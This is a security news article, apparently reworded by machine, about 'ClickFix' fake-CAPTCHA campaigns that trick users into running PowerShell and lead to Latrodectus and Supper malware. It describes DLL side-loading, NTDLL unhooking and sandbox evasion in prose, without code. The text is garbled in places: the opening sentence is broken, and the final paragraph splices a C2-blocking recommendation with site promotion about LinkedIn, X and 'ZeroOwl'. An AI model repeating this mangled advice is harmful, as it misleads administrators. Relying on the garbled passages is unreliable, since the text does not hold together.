Enterprise networks around the world are seriously threatened by a sophisticated cyberattack campaign that uses "ClickFix" social engineering This article explores presented phony captcha. . These widespread campaigns, which pose as fixing a fictitious technical issue, deceive users into running malicious code.

This scheme was recently exploited by a sizable Polish organization, illustrating how a single user's mistake can jeopardize an entire corporate infrastructure. The attack vector is notably dishonest. When users visit compromised websites, they are presented with a phony CAPTCHA or error verification prompt that frequently imitates the user interfaces of Microsoft Word or Google Chrome. This prompt tells the victim to copy a particular PowerShell script and manually run it using the Windows Run dialog (Win+R) in order to "fix" the problem.

The attackers are able to get around automated download filters and standard browser security measures by depending on the user to actively run the code. False CAPTCHA Prompt Instruction (Source: Cert.pl) The infection chain is started when the pasted script runs and downloads a dropper. Following the second paragraph of their investigation, Cert.pl analysts discovered suspicious traffic coming from the compromised host, which led them to identify the malware.

According to their analysis, the first PowerShell command creates a network foothold by retrieving a malicious payload from a distant domain. Although the initial vector depends on user interaction, the researchers stressed that without strong behavioral monitoring, the automated stages that follow are quick and challenging to stop. This infection has serious consequences and frequently compromises the entire organization.

The Latrodectus and Supper malware families are examples of secondary payloads that the attackers use to spread their initial access. These tools make it easier to exfiltrate data, move laterally, and possibly deploy ransomware. Threat actors can map the internal network covertly and identify vital assets for encryption or theft by using the compromised machine to proxy traffic.

Evasion Strategies and Infection Mechanisms The malware uses sophisticated evasion strategies, mostly DLL side-loading to conceal its existence. In the incident under analysis, the attackers placed a malicious wtsapi32.dll file in the %APPDATA%\Intel directory along with a legitimate igfxSDK.exe executable. The malicious library is automatically loaded when the legitimate application starts, enabling the code to run inside a trusted process.

This method successfully conceals the malicious activity from a large number of entry-level endpoint detection programs. Significant anti-analysis mechanisms are also employed by the identified Latrodectus variant. It blinds security tools to its actions by performing NTDLL unhooking, which removes monitoring hooks set by antivirus software.

Additionally, the malware looks for sandbox environments and won't run if it's launched by a common system tool like rundll32.exe. Blocking the execution of unconfirmed scripts, keeping an eye out for odd PowerShell activity, and warning staff members about the risks of "fixing" browser errors using the Run dialog are some of the recommendations. In order to receive more immediate updates, network administrators should also block known Command and Control (C2) IP addresses linked to Supper and Latrodectus, LinkedIn, and X. Additionally, they should set ZeroOwl as a preferred source in Google.